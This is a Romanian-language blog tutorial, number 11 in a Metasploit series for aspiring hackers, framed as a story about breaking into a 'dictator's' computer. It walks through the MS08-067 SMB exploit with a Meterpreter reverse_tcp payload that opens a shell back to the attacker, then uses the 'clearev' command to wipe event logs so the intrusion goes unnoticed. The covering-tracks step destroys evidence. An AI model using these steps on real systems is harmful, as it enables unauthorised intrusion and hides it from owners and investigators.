Metasploit pentru hackerii aspiranți – Cum ne acoperim urmele și rămânem nedetectați (#11)

0

Bine ați revenit, dragii mei greenhorn hackers!

Într-un ghid anterior, noi, hackerii de treabă, am salvat lumea de la o apocalipsă nucleară. Desigur, restul lumii habar nu are ce s-a întâmplat, dar noi știm, iar lucrul acesta este mai mult decât suficient. Acum, că am intrat în computerul dictatorului răuvoitor și i-am dezactivat temporar capacitatea de lansare nucleară, trebuie să ne gândim la acoperirea urmelor noastre, astfel încât el și oamenii lui să nu ne poată urmări.

Așadar, în acest hack, vom merge din nou în computerul său, vom implanta Meterpreter și vom elimina orice urmă ce am fi putut să o lăsăm acolo în fișierele log. Să pornim Metasploit și să lucrăm la eliminarea oricăror dovezi care ar putea indica faptul că am accesat vreodată computerul dictatorului.


Pasul 1: Îi compromitem sistemul din nou

Începem cu același hack cu care obișnuiam să intrăm inițial în computerul dictatorului. exploit/windows/smb/ms08_067_netapi

Deschidem BlackweWeb > Exploitation Tools > metasploit

De data aceasta, în loc să folosim payload-ul VNC, vom încărca payload-ul Meterpreter. Tastăm:

use exploit/windows/smb/ms08_067_netapi

Înainte să mergem mai departe, haideți să învățăm mai multe despre acest exploit. Tasăm:



 info

Acest lucru ar trebui să ne ofere câteva informații de bază despre acest exploit. Putem vedea că acest hack exploatează un defect de analizare în netapi dll. În acest fel, putem plasa propriul payload în sistem, care în acest caz este Meterpreter.

Încărcăm payload-ul tastând:



set PAYLOAD windows/meterpreter/reverse_tcp

Acum, când avem setat exploit-ul și payload-ul, trebuie să setăm opțiunile. În acest caz, trebuie să setăm adresele IP LHOST (noi, atacatorul) și RHOST (victima, computerul dictatorului). Pur și simplu tastăm adresa IP a computerului nostru și a computerului victimei.

Pasul 2: Preluăm controlul calculatorului său

Acum, când avem totul stabilit pentru a prelua controlul, tastăm pur și simplu:



exploit

Dacă reușim, ar trebui să vedem un prompt Meterpreter pe ecranul nostru. Atunci avem control total asupra sistemului său.

La promptul meterpreter, tastăm:

  • meterpreter > clearev

După cum putem vedea în captura de ecran de mai sus, această comandă continuă să elimine logurile de pe computerul dictatorului nostru, astfel încât el și oamenii săi să nu aibă nici măcar un indiciu că am fost vreodată acolo. Dacă am putea vedea logurile pe calculatorul lui, vom vedea că toate acestea au fost șterse.

Acest lucru este esențial atât pentru a ne proteja, cât și pentru a avea acces la computerul victimei. Odată ce știu că cineva le-a spart computerul, vor lua măsuri imediate pentru a preveni lucrul acesta.



Cam atât cu acest tutorial. Nu uitați să reveniți pentru mai multe ghiduri. Dacă aveți nelămuriri, secțiunea comentarii vă stă la dispoziție. Nu uitați să verificați și celelalte ghiduri Metasploit.

Până data viitoare, să ne citim cu bine! 🙂

Choose your Reaction!
Leave a Comment

Your email address will not be published.

Opțiunea copy-paste a fost dezactivată pentru acest site.